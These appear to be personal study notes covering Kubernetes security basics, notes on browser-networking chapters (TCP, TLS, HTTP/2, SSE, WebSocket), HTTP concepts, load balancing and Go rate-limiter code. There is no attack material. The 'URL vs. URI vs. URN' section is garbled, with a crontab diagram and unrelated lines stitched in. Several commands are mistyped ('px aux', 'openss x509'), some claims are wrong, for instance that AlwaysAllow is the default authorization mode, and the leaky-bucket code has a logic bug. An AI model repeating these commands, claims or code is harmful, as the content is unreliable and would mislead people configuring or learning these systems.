  • You should also scan the images for vulnerabilities before deploying them

Securing KubeProxy

  • KubeProxy is responsible for managing the network in a Kubernetes cluster
  • Ensure that proper permissions are set on the kube-proxy config file
    > px aux |grep -i kube-proxy |grep -i config - This will show the kube-proxy process and the config file it is using
    > ls -l /var/lib/kube-proxy/kube-config.conf - This will show the permissions on the kube-proxy config file
    

Pod Security

Pod Security Admission

  • Pod Security Policies (PSP) are deprecated in Kubernetes 1.21
  • Pod Security Admission (PSA) is the new way to enforce security policies on pods
  • PSA is a webhook that intercepts pod creation requests and validates them against a set of policies

Securing etcd

  • etcd is a distributed key-value store that stores the state of the cluster
  • etcd is a critical component of the cluster and should be secured
  • etcd should be configured to use TLS for encryption. To encrypt the database, you can create a EncryptionConfiguration object and pass it to the etcd pod

Kubernetes Security Fundamentals

Pod Security Admission

  • Replaces pod security standards
  • Meant to be safe and easy to use.
  • Enabled by default. Runs as an admission controller.
  • Applied to namespaces. To apply to a namespace, simply add a label:
    kubectl label ns <namespace> pod-security.kubernetes.io/<mode>=<security standard>
    
    • Modes:

      • What action to take if a pod violates the policy
      • The modes are: enforce, audit, warn
    • Standards:

      • These are built-in policies
      • They are: Privileged, baseline, and restricted

Authentication

  • Kubernetes does not manage user accounts itself. It depends on an external service to do that.
  • All authentication is managed by the kube-api server
  • Kube-api server authenticates users via certificates, tokens, or an external service such as LDAP or Kerberos

Authorization

  • Once someone or something is authenticated, what are they able to do? This is authorization.
  • There are 6 different authorization modes in Kubernetes:
    • Node
    • ABAC
    • RBAC
    • Webhook
    • AlwaysAllow (the default)
    • AlwaysDeny
  • Authorization mode can be configured on the kube-api server using the --authorization-mode flag

RBAC

  • Role, ClusterRole, RoleBinding ClusterRoleBinding

Secrets

  • Secrets are used to store sensitive information
  • They are similar in concept to ConfigMaps
  • Secrets are not encrypted, they are base64 encoded
  • Secrets are only loaded on nodes where they are needed.

Namespaces

  • Namespaces can be used to isolate or organize resources in a Kubernetes cluster
  • RBAC can be applied to namespaces for authorization

Resource Quotas and Limits

Resource Requests and Limits

Resource Quotas

  • Set a hard limit for resource requests and quotas defined on a pod

Limit Ranges

Security Context

  • a Security Context gives you the ability to do several things:
    • run the container as a different UID/GID
    • make the root file system read-only
    • etc
  • Some settings can be applied on the pod, and some can be applied on the container

Kubernetes Threat Model

  • Threat modeling helps you identify potential threats, understand their impact, and put measures in place to prevent them
  • Understand how traffic/data flows in the environment and identity vulnerabilities at each point

Persistence

  • Once an attacker accesses the environment, the first goal is typically to establishpersistence.
  • Persistence allows attackers to maintain access to a cluster

Denial of Service

  • Set resource quotas to prevent excessive resource usage
  • Restrict service account permissions
  • Use Network Policies and firewalls to control access
  • Monitor and alert on unusual activity

Platform Security

Observability

  • Falco is a tool that can be used to monitor actions taken on cluster nodes, such as reading/writing files, etc.

Service Mesh

  • A service mesh is a dedicated infrastructure layer for handling service-to-service communication
  • It can handle service discovery, load balancing, encryption, etc.
  • Istio is a popular service mesh

Istio

  • Istio is a service mesh that provides a way to control how microservices share data with each other
  • Istio works with Kubernetes and traditional workloads
  • Istio uses a high-performance proxy service called Envoy to manage traffic between services

Certificates

Openssl

  • You can use openssl to generate certificates for the cluster
  • Generate keys: openssl genrsa -out my.key 2048
  • Create a CSR: openssl req -new -key my.key -sub "/CN=KUBERNETES-CA" -out ca.csr
  • Sign certificates: openss x509 -req -in ca.csr -signkey my.key -out ca.crt

Compliance and Security Frameworks

Compliance Frameworks

  • Examples: GDPR, HIPAA, NIST, PCI DSS, CIS

GDPR

  • Introduced by the European Union to protect the data of citizens

HIPAA

  • A United States regulation used to control the access to health data

PCI DSS

  • Used to protect payment data

NIST

  • Created by the United States but recognized globally.
  • Used to protect compute environments by doing regular security-related audits (pentests, etc.)

CIS

  • CIS creates benchmarks for various environments such as operating systems and Kubernetes

Threat-Modeling Frameworks

  • Threat-modeling frameworks defined how to achieve the compliance frameworks mentioned above
  • Two thread-models of interests are STRIDE and MITRE

STRIDE

  • Created and maintained by Microsoft
  • Helps identity 6 categories of threats
    • Spoofing
    • Tampering
    • Repudiation
    • Information Disclosure
    • Denial of Service
    • Elevation of Privilege

MITRE

  • 5 categories
    • Initial Access
    • Execution
    • Persistence
    • Privilege Escalation
    • Defense Evasion
  • https://microsoft.github.io/Threat-Matrix-for-Kubernetes/

Supply Chain Compliance

  • Verify all the components (libraries, container images, etc.) that make up your application are secure and meet compliance requirements
  • Securing the supply chain focuses on 4 main areas:
    • artifacts
    • metadata
    • attestations
    • policies

Reduce docker image size

  • Smaller images are faster to download and deploy

  • Smaller images are more secure

  • Smaller images are easier to manage

  • To reduce the size of a docker image:

    • Use a smaller base image
    • Use specific package/image versions
    • Make file-system read-only
    • Don’t run the container as root
    • Use multi-stage builds
    • Remove unnecessary files
    • Use a .dockerignore file to exclude files and directories from the image
    • Use COPY instead of ADD
    • Use alpine images
    • Use scratch images
    • Use distroless images
  • Example of a multi-stage build:

    # build container stage 1
      FROM ubuntu
      ARG DEBIAN_FRONTEND=noninteractive
      RUN apt-get update && apt-get install -y golang-go
      COPY app.go .
      RUN CGO_ENABLED=0 go build app.go
    
    # app container stage 2
      FROM alpine:3.12.1 # it is better to use a defined tag, rather than 'latest'
      RUN addgroup -S appgroup && adduser -S appuser -G appgroup -h /home/appuser
      COPY --from=0 /app /home/appuser/app
      USER appuser # run as a non-root user
      CMD ["/home/appuser/app"]
    
  • Dockerfile best practices: https://docs.docker.com/build/building/best-practices/

  • Only certain docker directives create new layers in an image

    • FROM
    • COPY
    • CMD
    • RUN
  • dive and docker-slim are two tools you can use to explore the individual layers that make up an image

Static Analysis

SBOM

  • A SBOM is a list of all the software that makes up a container image (or an application, etc.)
  • Formats
    • SPDX
      • The standard format for sharing SBOM
      • Available in JSON, RDF, and tag/value formats
      • More complex than CycloneDX due to it’s extensive metadata coverage
      • Comprehensive metadata including license information, origin, and file details
    • CycloneDX
      • A lightweight format focused on security and compliance
      • Available in JSON and XML formats
      • Simpler and more focused on essential SBOM elements
      • Focuses on component details, vulnerabilities, and dependencies

Kubesec

  • Used for static analysis of manifests
  • https://github.com/controlplaneio/kubesec

Syft

  • Syft is a powerful and easy-to-use open-source tool for generating Software Bill of Materials (SBOMs) for container images and filesystems. It provides detailed visibility into the packages and dependencies in your software, helping you manage vulnerabilities, license compliance, and software supply chain security.
  • Syft can export results in SPDX, CycloneDX, JSON, etc.
  • To scan an image with syft and export the results to a file in SPDX format:
    syft scan docker.io/kodekloud/webapp-color:latest -o spdx --file /root/webapp-spdx.sbom
    

Grype

  • Grype is a tool (also from Anchore) that can be used to scan SBOM for vulnerabilities
  • To scan a SBOM with Grype:
    grype /root/webapp-sbom.json -o json --file /root/grype-report.json
    

Kube-linter

  • Kube-linter can be used to lint Kubernetes manifests and ensure best practices are being followed
  • kube-linter is configurable. You can disable/enable checks and even create your own custom checks
  • kube-linter includes recommendations for how to fix failed checks
  • https://github.com/stackrox/kube-linter

Scanning Images for Vulnerabilities

trivy

  • trivy can be used to scan images for vulnerabilities
  • https://github.com/aquasecurity/trivy
  • Example:
      sudo docker run --rm  aquasec/trivy:0.17.2 nginx:1.16-alpine
    

Networking

Directory Map

Browser Networking

Directory Map

Chapter 1

  • There are two critical components that dictate the performance of all network traffic
    • latency - The time it takes from the source to send a packet to the destination receiving it
      • Components of a typical router on the internet that contribute to latency
        • Propagation delay - Amount of time required for a message to travel from source to destination, which a function of distance over speed with which the signal propagates.
        • Transmission delay - Amount of time required to push all the packet’s bits onto the link, which is a function of the packet’s length and the bandwidth of the link.
        • Processing delay - Amount of time required to process the packet header, check for bit-level errors, and determine the packet’s destination.
        • Queuing delay - Amount of time the incoming packet is waiting in the queue until it can be processed.
        • The total latency between client and server is the sum of all delays just listed
    • bandwidth - The maximum throughput of a logical or physical communication path

Chapter 2

The TCP 3-way Handshake process:

  1. SYN - Client picks a random sequence number x and sends a SYN packet, which may also include additional TCP flags and options
  2. SYN/ACK - Server increments x by 1, picks own random sequence number y, appends its own flags and options, and dispatches the response
  3. ACK - Client increments both x and y by one and completes the handshake by dispatching the last ACK packet in the handshake

Flow control

  • Flow control is a method for preventing the sender from overloading the receiver with data they may not be able to process
  • Each side of the TCP connection advertises its own receive window (rwnd), which communicates the size of the available buffer space to hold the data
  • The window size can be changed during a transaction. If the window size changes to 0, this indicates the client cannot receive any more data until it finishes processing the existing buffered data
  • Each ACK packet carries the latest rwnd on each side of the connection

TCP Slow Start

TCP slow start is a congestion control mechanism used in TCP (Transmission Control Protocol), which is one of the core protocols of the Internet. The purpose of TCP slow start is to gradually increase the amount of data sent by a sender until it reaches an optimal level that maximizes network utilization without causing congestion. When a TCP connection is established between a client and a server, the sender begins by sending a small number of data packets. During the initial phase, the sender’s transmission rate is low to avoid overwhelming the network or causing congestion. This phase is known as slow start.

Here’s how TCP slow start works:

  1. Connection Establishment: The TCP connection is established between the sender and the receiver.
  2. Initial Congestion Window (cwnd): At the beginning of the connection, the sender sets its congestion window (cwnd) to a small value, usually one or two segments worth of data. The congestion window represents the number of unacknowledged packets that the sender can have in flight at any given time.
  3. Sending Data: The sender starts sending data to the receiver, and it waits for acknowledgments (ACKs) from the receiver for each packet sent.
  4. Doubling cwnd: For each ACK received, the sender increases its congestion window size by doubling it. This means that with every successful round-trip of ACKs, the sender is allowed to send twice as many packets as before.
  5. Exponential Growth: As the sender continues to receive ACKs, the congestion window keeps doubling, leading to an exponential growth in the sender’s data transmission rate.
  6. Congestion Avoidance: Once the congestion window reaches a certain threshold (known as the slow-start threshold), the congestion control mechanism switches from slow start to congestion avoidance. During congestion avoidance, the sender increases the congestion window linearly instead of exponentially.
  7. Multiplicative Decrease: In case of packet loss, which indicates network congestion, the sender interprets it as a sign of congestion and reduces its congestion window size significantly, implementing a multiplicative decrease.

The purpose of TCP slow start is to allow the sender to probe the available bandwidth and avoid overwhelming the network with a sudden surge of data. It provides a conservative approach to ensure network stability while still enabling the sender to ramp up its transmission speed to make efficient use of available resources. Slow start is essential for achieving fairness and stability in TCP-based communication across the Internet.

Congestion Avoidance

It is important to recognize that TCP is designed to use packet loss as a feedback mechanism to help regulate its performance. Slow start initializes the connection with a conservative congestion window, and for every round-trip, doubles the amount of data in flight until it exceeds the receiver’s flow-control window, a system-configured congestion threshold (ssthresh) or until a packet is lost, at which point the congestion avoidance alogorithm takes over.

Optimizing TCP

Some general guidelines for optimizing TCP on a system:

  • Ensure the system is running the latest kernel
  • Increase TCP’s Initial Congestion Window to 10
  • Disable slow-start after idle to improve performance for long-lived TCP connections, which transfer data in bursts
  • Enable Window Scaling to increase the maximum receive window size and allow high-latency connections to achieve better throughput
  • Enable TCP Fast Open to allow data to be sent in the initial SYN packet in certain situations.
  • Eliminate redundant data transfers. You cannot make the bits travel faster. However, you can reduce the amount of bits that are sent
  • Compress transferred data
  • Position servers closer to the user to reduce RTT
  • Reuse established TCP connections whenever possible

Inspecting open socket statitistics on Linux systems

sudo ss --options --extended --memory --processes --info to see current peers and their respective connection settings

Chapter 3

UDP

  • UDP packets are very simple. They only add an additional 4 headers to the payload. Checksum, length, source port, and destination port. Of which, only length and destination port are required.

NAT

Because UDP does not maintain connection state, NAT devices do not know when a connection is no longer active. NAT Translators expire UDP connections based on a timer. This timer is typically unique across manufacturers of NAT devices.

NAT Traversal

NAT can cause issues for client applications that need to be aware of the public IP of the connection. Some example applications are P2P apps such as VOIP, games, and file sharing. To workaround this issue, protocols such as STUN, TURN, and ICE were created.

  • STUN - Session Traversal Utilities for NAT. A protocol that allows the host application to discover the presence of a NAT device on the network, and when present obtain the allocated public IP address and port tuple for the current connection. To do this, the application requires assistance from a well-known, third party STUN server that resides on the network. The IP address of the STUN server can be shared via DNS.
  • TURN - Traversal Using Relays around NAT. Runs over UDP, but can switch to TCP when it fails. Requires a well-known public relay to shuttle the data between peers.

Chapter 4

SSL/TLS

  • TLS was designed to operate on top of a reliable transport protocol such as TCP. However, it has also been adapted to run over UDP.
  • The TLS protocol was designed to provide 3 servers; authentication, encryption, and data integrity. Though, you are not required to use all three in every situation.
  • In order to establish a cryptographically secure data transfer channel, the peers must agree on a cypher suite and the keys used to encrypt the data. The TLS protocol defines a well-known handshake to perform this exchange, known as the TLS handshake.
  • TLS uses asymmetric (public key) cryptography.

Chapter09

Chapter 10

  • The execution of a web app involves three tasks
    1. Fetch resources
    2. page layout and rendering
    3. Javascript execution

The rendering and scripting steps are symmetric, it is not possible to run them concurrently.

The Navigation Timing API is included in most modern web browsers. It can be used for a wholistic view of page load timing. It includes DNS and TCP connect times with high precision. The Resource Timing API is also included with most modern browsers can can be used to view the performance profile of a page. The User Timing API provides a simple JavaScript API to mark and measure application-specific performance metrics with the help of high-resolution timers.

Chapter 11

HTTP Pipelining

HTTP Pipelining is a technique used in the HTTP protocol to allow multiple requests to be sent by the client without waiting for a response from the server. The server can respond to these requests in any order, and the client can process the requests as they arrive. HTTP pipelining adoption has remained very limited despite it’s many benefits. This is because of several drawbacks:

  1. A single slow response blocks all requests behind it
  2. When processing requests in parallel, servers must buffer all responses behind the current response. This could lead to resource exhaustion on the server as buffers grow larger and larger.
  3. A failed response may terminate the TCP connection, causing the client to retransmit the request. This could lead to duplicate request processing on the server.
  4. Intermediary devices in the network hop path can cause issues, and compatibility with Intermediary devices is hard to detect. One way around this is to use a secure tunnel, which prevents intermediary devices from reading/modifying the connection.

Head of Line Blocking

Head of Line blocking can be caused by HTTP pipelining. With HTTP Pipelining, the server processes requests in the order they are received. If a particular request takes a long time to process, the responses for other requests will be blocked.

Headers

  • Headers remain unmodified and are always sent as plain text to remain compatible with previous versions of HTTP. Headers were introduced in HTTP 1.0. Headers typically add 500-800 bytes to the total payload. However, cookies can make them dramatically larger. RFC 2616 does not define a limit on the size of HTTP headers. However, many servers and proxies will try to enforce either an 8 KB or 16 KB limit.
  • The growing list of headers is not bad in and of itself. However, the fact that all HTTP headers are transferred in plain text (without compression) can lead to high overhead costs for each and every request.
  • In the example below, we can see that our headers make up 157 bytes of the payload, while the content itself only takes up 15 bytes.
$ curl --trace-ascii - -d'{"msg":"hello"}' http://www.igvita.com/api

== Info:   Trying 173.230.151.99:80...
== Info: Connected to www.igvita.com (173.230.151.99) port 80 (#0)
=> Send header, 157 bytes (0x9d)
0000: POST /api HTTP/1.1
0014: Host: www.igvita.com
002a: User-Agent: Mozilla/5.0 Gecko
0049: Accept: */*
0056: Content-Length: 15
006a: Content-Type: application/x-www-form-urlencoded
009b: 
=> Send data, 15 bytes (0xf)
0000: {"msg":"hello"}

Concatination and Spriting

  • Concatination is the ability for HTTP 1.x to bundle multiple JavaScript or CSS files into a single resource
  • Spriting is the ability for multiple images to be combined into a larger, composite image and sent via a single response.

Chapter12

  • HTTP 2.0 introduced a new form of encapsulation which provides more efficient use of network resources and reduced perception of latency by allowing header field compression and multiple concurrent messages on the same connection.

Binary Framing Layer

At the core of the HTTP 2.0 enhancements it the HTTP Binary Framing Layer, which dictates how HTTP messages are encapsulated and transmitted between client and server. The “layer” refers to a design choice to introduce a new mechanism between the socket interface and the higher HTTP API exposed to the application. HTTP 1.x messages are new-line delimited. All HTTP 2.0 communication is split into smaller messages and frames, each of which is encoded in binary format.

Streams, Messages, and frames

HTTP 2.0 introduced some new terminology. Let’s go over that now.

  • Stream = a bidirectional flow of bytes within an established HTTP 2.0 connection. All communication is performed within a single TCP connection. Each string has a unique integer identifier.
  • Message = a complete sequence of frames that map to a logical message. The message is a logical HTTP message, such as a request or response.
  • Frame = The smallest unit of HTTP communication, each containing a frame header, which at a minimum identifies to which stream the frame belongs. Frames carry specific types of data, such as headers, payloads, etc.
TCP Connection
------------------------------------------------------------------------------------------------------------------------------------------
Stream 1:
==============================================================              ==============================================================
Message: Frame[<Header>] Frame[<Payload>]                                   Message: Frame[<Header>] Frame[<Payload>]
==============================================================              ==============================================================

Stream 2:
==============================================================              ==============================================================
Message: Frame[<Header>] Frame[<Payload>]                                   Message: Frame[<Header>] Frame[<Payload>]                                   
==============================================================              ==============================================================
------------------------------------------------------------------------------------------------------------------------------------------

This model provides request and response multiplexing, in which the client can be transmitting frames to the server, and at the same time the server can be transmitting frames to the client. All within a single TCP connection. This essentially eliminates the head-of-line blocking problem!

Server Push

HTTP 2.0 also introduces Server Push. With server push, a client may send a single request for a resource, and the server can then send multiple responses back for resources that it knows the client will need. Why would we ever need this? A web page/app consists of multiple resources, all of which are discovered by the client while examining the document provided by the server. If the server knows the client is going to need those additional resources, it can just send them without the client actually requesting them. What if the client doesn’t want these additional resources? The client has the option to deny the resource being sent by the server. This process is implemented via a “Push Promise”. All server pushes are initiated with a Push Promise, which signals the servers intent to push resources to the client. The Push Promise frame only contains the HTTP headers of the promised resource. Once the client receives the promise, it has the option to decline the stream if it wants to (i.e. if the resource is already in the local client cache).

Apache’s MOD_SPDY mod looks for an X-ASSOCIATED-CONTENT header, which lists the resources to be pushed. The server can also just parse the document and infer the resources to be pushed. The strategy for implementing server push is not defined in the RFC, and is left up to the developer.

Header compression

Each HTTP 1.x transfer carries headers with it that can consume anywhere from 300-800 bytes of overhead per request, and kilobytes more if cookies are required. To reduce this overhead, HTTP 2.0 introduced header compression.

  • Instead of transmitting the same data on each request and response, HTTP 2.0 uses “header tables” on both the client and server to keep track of previously sent key-value pairs
  • Header tables persist for the lifetime of the HTTP 2.0 connection and can be incrementally updated
  • Key-value pairs can be added or replaced

The key-value pairs for some headers like “method” and “scheme” rarely change during a connection, so a second request within the connection will not need to send these headers, saving several hundred bytes of data.

Chapter 13

The physical properties of the communication channel set hard performance limits on every application. Speed of light and distance between client and server dictate the propagation latency, and the choice of medium (wired vs. wireless) determines the processing, transmission, queueing, and other delays incurred by each data packet. In fact, the performance of most web apps is limited by latency, not by bandwidth. While bandwidth speeds continue to increase, the same cannot be said for latency. As a result, while we cannot make the bits travel any faster, it is crucial that we apply all the possible optimizations at the transport and application layers to eliminate unnecessary round trips, requests, and minimize the distance traveled by each packet.

  • Latency is the bottleneck, and the fastest bits are bits not sent.

Caching resources on the client

  • The cache-control header can specify the cache lifetime of a resource
  • The last-modified and ETag headers provide validation mechanisms for cached resources
  • You need to specify both the cache-control and last-modified headers. You cannot use one OR the other.

Optimizing for HTTP 2.0

At a minimum:

  1. Server should start with a TCP CWND of 10 segments
  2. Server should support TLS with ALPN negotiation
  3. Server should support TLS connection reuse to minimize handshake latency

Chapter 15

XHR

XHR is a browser-level API that allows the client to script data transfers via JavaScript. XHR made it’s first debut in IE5, and was created by the original team that built the Outlook Web App. It was one of the key technologies behind the Async JavaScript and XML (AJAX) revolution. Prior to XHR, the webpage had to be refreshed to send any state updates between client and server. With XHR, this workflow could be done async and under full control of the application in JavaScript code. XHR is what enabled us to make the leap from building basic web pages to building full web applications.

CORS (Cross Origin Resource Sharing)

XHR is a browser-level API that automatically handles myriad low-level details such as caching, handling redirects, content negotiation, authentication, and much more. This serves a dual purpose. First it makes the application APIs much easier to work with, allowing us to focus on the business logic. But, second, it allows the browser to sandbox and enforce a set of security and policy constraints on the application code.

The XHR interfaces enforces strict HTTP semantics on each request. While the XHR API allows the application to add custom HTTP headers (via the SetRequestHeader() method) there are a number of protected headers that are off-limits to application code:

  • Accept-Charset, Accept-Encoding, Access-Control-*
  • Host, Upgrade, Connection, Referrer, Origin
  • Cookie, Sec-, Proxy-, and lots more

The browser will refuse to override any of the unsafe headers. Protecting the Origin header is the key piece of the ‘same-origin policy’ applied to all XHR requests.

  • An origin is defined as a triple of application protocol, domain name, and port number (example: https, google.com, 443)

The motivation for CORS is simple, the browser stores vulnerable information, such as auth tokens, cookies, and other private metadata, which cannot be leaked across applications.

The browser automatically appends the protected Origin HTTP header, which advertises the origin from where the request is being made. In turn, the remote server is then able to examine the Origin header and decide if it should allow the request by returning an Access-Control-Allow-Origin header in its response.

  • CORS requests omit user credentials such as cookies and auth tokens

Polling with XHR

XHR enables a simple and efficient way to sync client updates with the server. Whenever necessary, an XHR request is dispatched by the client to update the appropriate data on the server. However, the same problem, in reverse, is much more difficult. If data is updated on the server, how does the server notify the client? The answer is that the client must poll the server.

Chapter 16

Server Sent Events (SSE)

Server-Sent Events (SSE) is a technology that enables a server to send continuous updates or event streams to clients over HTTP. It is a unidirectional communication method where the server pushes data to the client, allowing real-time updates without the need for the client to repeatedly request information. To meet this goal, SSE introduced two components: a new EventSource interface in the browser, which allows the client to receive push notifications from the server as DOM events, and the “event stream” data format, which is used to deliver the individual updates.

Here’s how Server-Sent Events work:

  1. Establishing a Connection: The client initiates a regular HTTP connection with the server by sending a GET request to a specific URL that handles SSE.
  2. Server Response: Upon receiving the GET request, the server responds with an HTTP header containing the “Content-Type” field set to “text/event-stream”. This indicates that the server will be sending events rather than a traditional HTTP response.
  3. Event Stream Format: The server sends events in a specific format. Each event is represented as a separate message and consists of one or more lines. Each line can either be an event field or data field. An event field starts with “event:” followed by the event name, while a data field starts with “data:” followed by the event data.
  4. Connection Persistence: Unlike traditional HTTP requests, SSE connections persist and remain open until either the server or the client explicitly closes them. This enables the server to send events to the client whenever updates occur.
  5. Event Lifecycle: The server can send events at any time, and the client receives them immediately. The client-side JavaScript code can listen for these events and perform actions or update the user interface based on the received data.
  6. Error Handling: SSE connections can handle errors gracefully. If the connection is lost, the client automatically attempts to reconnect, allowing a reliable and uninterrupted stream of events.
  7. Closing the Connection: The client or server can close the connection at any time. If the client wants to terminate the SSE connection, it can simply close the connection from its end, and the server will recognize that the client is no longer available.

Server-Sent Events are often used for real-time notifications, live feeds, chat applications, or any scenario where continuous updates from the server to clients are required. It provides a lightweight and easy-to-use alternative to WebSockets when bidirectional communication is not necessary.

Event Stream Protocol

An SSE event stream is delivered as a streaming HTTP response:

  1. The client send a regular HTTP GET request
  2. The server responds with a custom “text/event-stream” content-type header, and then stream the UTF-8 encoded data.

Chapter 17

Websocket

Websocket enables bidirectional, message-oriented streaming of text and binary data between client and server. It is the closest thing to a raw network socket in the browser that we have.

The WebSocket resource URL uses its own custom scheme: ws for plain-text communication and wss for encrypted (TLS) communication. Why the custom scheme, instead of http/s? The primary use case for the Websocket protocol is to provide an optimized, bidirectional communication channel between applications running in the browser and server. However, the WebSocket wire protocol can be used outside of the browser and could be negotiated via a non-http exchange.

WebSocket communication consists of messages and application code and does not need to worry about buffering, parsing and reconstructing received data. For example, if the server sends a 1 MB payload, the applications onmessage callback will only be called once the client receives the entire payload.

WebSockets can transfer test or binary data.

HTTP

Directory Map

Clean URLs

Definition

Clean URLs, also known as user-friendly URLs, pretty URLs, search engine-friendly URLs, or RESTful URLs, are web addresses (Uniform Resource Locators or URLs) designed to enhance the usability and accessibility of websites, web applications, or web services. They aim to be immediately meaningful to non-expert users, reflect the logical structure of information, and decouple the user interface from the server’s internal representation.

Benefits

  • Improved usability and accessibility for users.
  • Enhanced search engine optimization (SEO).
  • Conformance with the representational state transfer (REST) architectural style.
  • Consistency in web resource locations, facilitating bookmarking.
  • Reduced difficulty in changing the resource implementation, as clean URLs don’t contain implementation details.
  • Improved security by concealing internal server or application information.

Structure

Clean URLs typically consist of a path that represents a logical structure that users can easily understand. They avoid including opaque or irrelevant information such as numeric identifiers, illegible data, or session IDs found in query strings.

Examples

  • Original URL: http://example.com/about.html Clean URL: http://example.com/about
  • Original URL: http://example.com/user.php?id=1 Clean URL: http://example.com/user/1
  • Original URL: http://example.com/index.php?page=name Clean URL: http://example.com/name
  • Original URL: http://example.com/kb/index.php?cat=1&id=23 Clean URL: http://example.com/kb/1/23
  • Original URL: http://en.wikipedia.org/w/index.php?title=Clean_URL Clean URL: http://en.wikipedia.org/wiki/Clean_URL

Implementation

The implementation of clean URLs involves URL mapping through pattern matching or transparent rewriting techniques on the server side. This ensures that users primarily interact with clean URLs.

For SEO, developers often include relevant keywords in clean URLs and remove unnecessary words, enhancing user-friendliness and search engine rankings.

Slug

A slug is the part of a URL that contains human-readable keywords identifying a page. It typically appears at the end of the URL and serves as the name of the resource. Slugs can be automatically generated from page titles or entered manually.

Characteristics of Slugs

  • Often entirely lowercase.
  • Accented characters replaced by Latin script letters.
  • Whitespace characters replaced by hyphens or underscores.
  • Punctuation marks removed.
  • Some common words (e.g., conjunctions) may be removed.

Slugs provide a brief idea of a page’s topic, help organize long lists of URLs, and make filenames more descriptive when saving web pages locally.

Websites using slugs include Stack Exchange Network and Instagram for question titles and user-specific URLs.

HTTP Persistent Connection

HTTP persistent connection, also known as HTTP keep-alive or connection reuse, involves using a single TCP connection for multiple HTTP requests/responses instead of opening new connections for each pair. This method is employed in both HTTP/1.0 (unofficially through an extension) and HTTP/1.1 (officially, with all connections considered persistent unless specified otherwise). It offers several advantages, including reduced latency, CPU usage, network congestion, and enhanced HTTP pipelining. However, it can lead to resource allocation issues on the server if connections are not properly closed. Modern web browsers and Python’s requests library support HTTP persistent connections.

Overview

  • Definition: A method to use a single TCP connection for multiple HTTP requests/responses.
  • Also Known As: HTTP keep-alive, connection reuse.

Versions

  • HTTP/1.0: Unofficially implemented through an extension.
  • HTTP/1.1: Officially supports persistent connections as a default.

Advantages

  1. Reduced Latency: Fewer delays in communication.
  2. Lower CPU Usage: Less processing power required for connection setup and teardown.
  3. Decreased Network Congestion: Fewer connections lead to less network traffic.
  4. Enhanced HTTP Pipelining: Efficient request/response processing.

Disadvantages

  • Resource Allocation Issues: Potential server problems due to improperly closed connections.

Support

  • Modern Web Browsers: Generally support HTTP persistent connections.
  • Python’s requests Library: Also supports this feature.

For more detailed information, visit the Wikipedia article.

.---------------- URN

URL vs. URI vs. URN

# .---------------- URN
# |                                     .------------- hour (0 - 23)
# |                                  |  .---------- day of month (1 - 31)
# |                                  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |                                  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |                                  |  |  |  |
  -----------------------------------------------------------------
                            ---------------------------------------
https://rnemeth90.github.io/posts/2023-12-12-golang-url-validation/

# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Load Balancing

Directory Map

load balancing

Static Algorithms

Round Robin

  • The client requests are sent to different service instances in sequential order. The services are usually required to be stateless.

Sticky Round Robin

  • This is an improvement of the round-robin algorithm. If Alice’s first request goes to service A, the following requests go to service A as well.

Weighted round-robin

  • The admin can specify the weight for each service. The ones with a higher weight handle more requests than others.

Hash

  • This algorithm applies a hash function on the incoming requests’ IP or URL. The requests are routed to relevant instances based on the hash function result. We can use other attributes for hashing algorithms. For example, HTTP header, request type, client type, etc.

Dynamic Algorithms

Least connections

  • A new request is sent to the service instance with the least concurrent connections.

Least response time

  • A new request is sent to the service instance with the fastest response time.

Nginx

Directory Map

set header

    nginx.ingress.kubernetes.io/server-snippet: |
        if ($upstream_status == 404){
            #set header
            add_header x-aprimo-upstream-status "my server header content!";
        }

Rate Limiting Algorithms

Directory Map

Fixed Window Counter Algorithm

The algorithm divides a timeline into fixed-size windows and assign a counter to each window. Each request increments the counter by 1. Once the counter reaches the pre-defined threshold, future requests are dropped until a new time window starts.

Leaking Bucket Algorithm

Similar to a token bucket except that requests are processed at a fixed rate. It is usually implemented with a queue (FIFO).

When a request arrives, the system checks if the queue is full. If it is not full, the request is added to the queue. Otherwise, the request is dropped. Requests are pulled from the queue and processed at regular intervals.

Leaking Bucket algorithm takes two parameters; Bucket size (usually equal to the queue size) and Outflow rate (how many requests can be processed per second).

package main

import (
	"sync"
	"time"
)

type LeakyBucket struct {
	capacity    int64
	remaining   int64
	leakRate    time.Duration
	lastLeak    time.Time
	mu          sync.Mutex
}

func NewLeakyBucket(capacity int64, leakRate time.Duration) *LeakyBucket {
	return &LeakyBucket{
		capacity:  capacity,
		remaining: capacity,
		leakRate:  leakRate,
		lastLeak:  time.Now(),
	}
}

func (b *LeakyBucket) TryTake(n int64) bool {
	b.mu.Lock()
	defer b.mu.Unlock()

	// Calculate the time since the last leak
	now := time.Now()
	leaked := int64(now.Sub(b.lastLeak) / b.leakRate)

	// Update the bucket's current state
	if leaked > 0 {
		if leaked >= b.remaining {
			b.remaining = b.capacity
		} else {
			b.remaining += leaked
		}
		b.lastLeak = now
	}

	// Try to take n from the bucket
	if n > b.remaining {
		return false
	}
	b.remaining -= n
	return true
}

func main() {
	bucket := NewLeakyBucket(10, time.Second)
	for {
		if bucket.TryTake(1) {
			println("Took 1 from the bucket")
		} else {
			println("Bucket is empty, waiting...")
		}
		time.Sleep(100 * time.Millisecond)
	}
}

TOKEN BUCKET ALGORITHM

The token bucket rate limiting algorithm is a popular method for rate limiting, used by companies like Amazon and Stripe.

A token bucket is a container that has a pre-defined capacity. Tokens are put in the bucket at preset rates periodically. Once the bucket is full, no more tokens are added. Each request consumes one token. When a request arrives, we first check if there are available tokens in the bucket. If there are no tokens available, the request is denied.

The token bucket algorithm takes two parameters. Bucket size (the number of tokens the bucket can store) and refill rate (number of tokens put into the bucket every second).

Example:

package main

import (
	"fmt"
	"sync"
	"time"
)

// TokenBucket represents a token bucket rate limiter
type TokenBucket struct {
	tokens           int
	capacity         int
	tokenRate        time.Duration
	lastRefill       time.Time
	mu               sync.Mutex
}

// NewTokenBucket creates a new token bucket
func NewTokenBucket(capacity int, refillRate time.Duration) *TokenBucket {
	return &TokenBucket{
		tokens:           capacity,
		capacity:         capacity,
		tokenRate:        refillRate,
		lastRefill:       time.Now(),
	}
}

// refill refills tokens in the bucket based on the elapsed time since the last refill
func (tb *TokenBucket) refill() {
	now := time.Now()
